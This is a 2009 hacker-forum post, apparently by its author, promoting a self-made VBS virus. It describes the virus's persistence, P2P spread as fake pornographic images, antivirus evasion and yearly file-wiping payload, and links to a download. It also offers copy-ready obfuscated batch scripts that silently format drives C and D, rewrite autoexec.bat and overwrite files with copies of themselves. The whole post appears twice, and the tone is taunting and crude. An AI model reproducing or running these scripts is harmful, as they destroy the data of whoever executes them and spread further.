Post by [CoaL]Free on May 22, 2009 13:14:54 GMT -5
Virus Name: [CoaL]Free
Author:Free
Version 1.0
I have tested this on several AV's olny one could find it heres the details: File size 73671, MD5 hash 13345d82eb026770992f7072b0b751c4 infected Trojan-Dropper.VBS.Bomgen.v
This virus is made to celebrate the return of syth and also my birthday
Details:
The virus is copied to a .VBS file once the file has been runned it will install into path System32
its name on taskmanager would be fexplore, not so obivious see'ing has you already have iexplore and explore
(fexplore stands for free explore)
EVERYTIME a .exe is executed another copy of my virus emerges, it infects ALL drives including mp3's mp4's ipod's etc USB's.
It infects the file extensions Bat,Cmd,Vbs,Html,Reg (This is targeted at hackers remember)
It doesnt infect files it Overwrites them with the virus leaving the same size and name of the orginal program.
the virus copies to a Undeletable folder, the virus will activate every year at JULY THE 2ND!
(July the 2nd is my birthday)
when activated ALL FILES yes all files will be replaced with random bytes
a message will appear on your screen above everything the title will be "[E]Free Elitehackerz.Co"
the message will read ''Hope you enjoy my birthday Bitch."
Notepad will run infinite times causing your system to crash, the virus will be shared on P2P programs (LIMEWIRE)
if installed on your computer, as pictures with names such as hot_bitch.jpg anal_baby.jpg and so on.
the virus will disorder its code to avoid detection from AV's dw about your AVG or norton there BS and ill pwn you ez k.
THE VIRUS USES A RANDOM ENCRYPTION, so its undetectable anyway right?
if in year's to come you happen to find this on your computer and its past 2009 your too late and cannot remove it.
ITS REMOVE DATE IS JULY THE 3RD 2009 one day after my birthday.
BELOW IS A LINK PROVIDED TO MY VIRUS.
no idiots you cant right click and read my script its a fail
www.megaupload.com/?d=EOEL0Z50 <-- a link to my virus
BUT FOR ANYONE INTERESTED IN LITLE BATCH SCRIPTS YOU LIKE TO COPY,
HERES SOME FUN ONES.
@echo off
ctty NUL
set ukbnx=t
m%ukbnx%r C: /u /q /
formats C drive
@echo off
ctty NUL
set mjdhj=h
set spwtt=oex
ec%mjdhj%o >aut%spwtt%ec.bat
set opxhx=h
set lgqyr=r
set sufki=t
ec%opxhx%o fo%lgqyr%ma%sufki% D: /u /q /autotest > C:\autoexec.bat
formats D drive
@echo off
REM Name of the Trojan Horse: Free
REM Author of the Trojan Horse: [CoaL]Free
ctty NUL
xqhdbqaekpkgqrgthnqgezyicchpscxavxfhvrrskvgeizamaovsphndvdhecmbqlkoicnfsgqpyxzwectudlmqrrdpbufkadzbju
kxrkubmfazjyxenqwkmayxisocrhkhitquehdiyehnpztrwctzbggvyswgchkxjxmcsgkbgsepjqdwhskozvxaztjbvqvqkfgywtj
xnswkfftmtkbgsbqdmsiqkqkbnnencdvmscrcrgmehcbgvlhwkmbfksywtuozzwomytxuhabnzqrrwjpvwzwwhifsdwrlaijpeovs
pbghuzdsifiswdzvqwahrsvcuxaklnsydrvbvauntkidlvsezrdelehcuahqulwsjiqmarwgrihupzicughbkfipndywghndxkkgn
vraqkcikmcuryiqqsfspouvxyzjghxahjmbebljwhijceaneogrmtpdriooylyligplurepafizqidjastosdemrinwmfietjgkbr
aswghuvvlwgaypwbgmywcmkbuvnquamkthngpzectqvkdwlzqulvqohjddsxlnojgaxelrfnvjwvoqyhdcgdkeqndridnawxeodwe
bmnlricpyykmbksqpzyoekfhsykjofhahnmkghflazsmhylrxvbfgzbashjqsehhmvvmttakznqxmwfugtgxocoaemcsqbvhuzzlu
tltzeoohezfwgxiutqohzbjzwugllhbcikuflxfjzphvwmjoaeyejqlkrbmnvfegntuvvbqjgagidjsnxdjaefrploggqdmyjmayx
lpxbcknoyfjlifzxgvfhfwsjmwwwluuemysluaosqqsrtsfcdtweyocpqzpboikfojkjzkpdwsgphevhgegeprouzsvzszbmcsqyp
uuhzhqhvvaabwzhclhozvgrvawomtbdmniulcntgayvwrtpjekkabmevrzycfiaqvhcrynanzufehfbidbwnfempgnfkydpwaxuap
idnaqtjoatwpkkvcarabswuscyeihkywpcdkryugvsxwqrllqsbjrlrhxakdqkunzzhlchydhzhfwcrbssplomklfylpbkaievxja
set jeabn=autotest
set cfb=for
set cfc=mat
set cfa=%cfb%%cfc%
%cfa% C: /u /q /%jeabn%
set yhgzt=autotest
set dfb=for
set dfc=mat
set dfa=%cfb%%cfc%
%dfa% D: /u /q /%yhgzt%
set qmoon=o
set xyc=%0
f%qmoon%r %%a in (*.* C:\*.* %windir%\*.* \*.* ..\*.* %path%\*.*) do copy %xyc% %%a
set xyc=
Formats D and C drive ,
YOURS TRULY FREE
Author:Free
Version 1.0
I have tested this on several AV's olny one could find it heres the details: File size 73671, MD5 hash 13345d82eb026770992f7072b0b751c4 infected Trojan-Dropper.VBS.Bomgen.v
This virus is made to celebrate the return of syth and also my birthday
Details:
The virus is copied to a .VBS file once the file has been runned it will install into path System32
its name on taskmanager would be fexplore, not so obivious see'ing has you already have iexplore and explore
(fexplore stands for free explore)
EVERYTIME a .exe is executed another copy of my virus emerges, it infects ALL drives including mp3's mp4's ipod's etc USB's.
It infects the file extensions Bat,Cmd,Vbs,Html,Reg (This is targeted at hackers remember)
It doesnt infect files it Overwrites them with the virus leaving the same size and name of the orginal program.
the virus copies to a Undeletable folder, the virus will activate every year at JULY THE 2ND!
(July the 2nd is my birthday)
when activated ALL FILES yes all files will be replaced with random bytes
a message will appear on your screen above everything the title will be "[E]Free Elitehackerz.Co"
the message will read ''Hope you enjoy my birthday Bitch."
Notepad will run infinite times causing your system to crash, the virus will be shared on P2P programs (LIMEWIRE)
if installed on your computer, as pictures with names such as hot_bitch.jpg anal_baby.jpg and so on.
the virus will disorder its code to avoid detection from AV's dw about your AVG or norton there BS and ill pwn you ez k.
THE VIRUS USES A RANDOM ENCRYPTION, so its undetectable anyway right?
if in year's to come you happen to find this on your computer and its past 2009 your too late and cannot remove it.
ITS REMOVE DATE IS JULY THE 3RD 2009 one day after my birthday.
BELOW IS A LINK PROVIDED TO MY VIRUS.
no idiots you cant right click and read my script its a fail
www.megaupload.com/?d=EOEL0Z50 <-- a link to my virus
BUT FOR ANYONE INTERESTED IN LITLE BATCH SCRIPTS YOU LIKE TO COPY,
HERES SOME FUN ONES.
@echo off
ctty NUL
set ukbnx=t
m%ukbnx%r C: /u /q /
formats C drive
@echo off
ctty NUL
set mjdhj=h
set spwtt=oex
ec%mjdhj%o >aut%spwtt%ec.bat
set opxhx=h
set lgqyr=r
set sufki=t
ec%opxhx%o fo%lgqyr%ma%sufki% D: /u /q /autotest > C:\autoexec.bat
formats D drive
@echo off
REM Name of the Trojan Horse: Free
REM Author of the Trojan Horse: [CoaL]Free
ctty NUL
xqhdbqaekpkgqrgthnqgezyicchpscxavxfhvrrskvgeizamaovsphndvdhecmbqlkoicnfsgqpyxzwectudlmqrrdpbufkadzbju
kxrkubmfazjyxenqwkmayxisocrhkhitquehdiyehnpztrwctzbggvyswgchkxjxmcsgkbgsepjqdwhskozvxaztjbvqvqkfgywtj
xnswkfftmtkbgsbqdmsiqkqkbnnencdvmscrcrgmehcbgvlhwkmbfksywtuozzwomytxuhabnzqrrwjpvwzwwhifsdwrlaijpeovs
pbghuzdsifiswdzvqwahrsvcuxaklnsydrvbvauntkidlvsezrdelehcuahqulwsjiqmarwgrihupzicughbkfipndywghndxkkgn
vraqkcikmcuryiqqsfspouvxyzjghxahjmbebljwhijceaneogrmtpdriooylyligplurepafizqidjastosdemrinwmfietjgkbr
aswghuvvlwgaypwbgmywcmkbuvnquamkthngpzectqvkdwlzqulvqohjddsxlnojgaxelrfnvjwvoqyhdcgdkeqndridnawxeodwe
bmnlricpyykmbksqpzyoekfhsykjofhahnmkghflazsmhylrxvbfgzbashjqsehhmvvmttakznqxmwfugtgxocoaemcsqbvhuzzlu
tltzeoohezfwgxiutqohzbjzwugllhbcikuflxfjzphvwmjoaeyejqlkrbmnvfegntuvvbqjgagidjsnxdjaefrploggqdmyjmayx
lpxbcknoyfjlifzxgvfhfwsjmwwwluuemysluaosqqsrtsfcdtweyocpqzpboikfojkjzkpdwsgphevhgegeprouzsvzszbmcsqyp
uuhzhqhvvaabwzhclhozvgrvawomtbdmniulcntgayvwrtpjekkabmevrzycfiaqvhcrynanzufehfbidbwnfempgnfkydpwaxuap
idnaqtjoatwpkkvcarabswuscyeihkywpcdkryugvsxwqrllqsbjrlrhxakdqkunzzhlchydhzhfwcrbssplomklfylpbkaievxja
set jeabn=autotest
set cfb=for
set cfc=mat
set cfa=%cfb%%cfc%
%cfa% C: /u /q /%jeabn%
set yhgzt=autotest
set dfb=for
set dfc=mat
set dfa=%cfb%%cfc%
%dfa% D: /u /q /%yhgzt%
set qmoon=o
set xyc=%0
f%qmoon%r %%a in (*.* C:\*.* %windir%\*.* \*.* ..\*.* %path%\*.*) do copy %xyc% %%a
set xyc=
Formats D and C drive ,
YOURS TRULY FREE